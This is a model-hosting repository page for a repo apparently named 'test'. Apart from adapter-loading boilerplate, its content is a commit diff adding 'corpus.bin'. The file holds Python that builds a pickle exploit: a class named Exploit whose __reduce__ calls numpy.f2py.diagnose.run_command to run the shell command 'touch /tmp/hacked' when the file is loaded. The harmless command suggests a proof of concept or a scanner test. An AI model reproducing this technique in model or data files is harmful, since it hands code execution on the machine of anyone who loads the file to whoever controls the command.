Instructions to use hllllllllll/test with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- Adapters
How to use hllllllllll/test with Adapters:
from adapters import AutoAdapterModel model = AutoAdapterModel.from_pretrained("undefined") model.load_adapter("hllllllllll/test", set_active=True) - Notebooks
- Google Colab
- Kaggle
Create corpus.bin
Browse files- corpus.bin +1 -0
corpus.bin
ADDED
|
@@ -0,0 +1 @@
|
|
|
|
|
|
|
| 1 |
+
import torch class Exploit: def __reduce__(self): import numpy.f2py.diagnose return numpy.f2py.diagnose.run_command, ('touch /tmp/hacked', ) torch.save(Exploit(), 'payload/corpus.bin')
|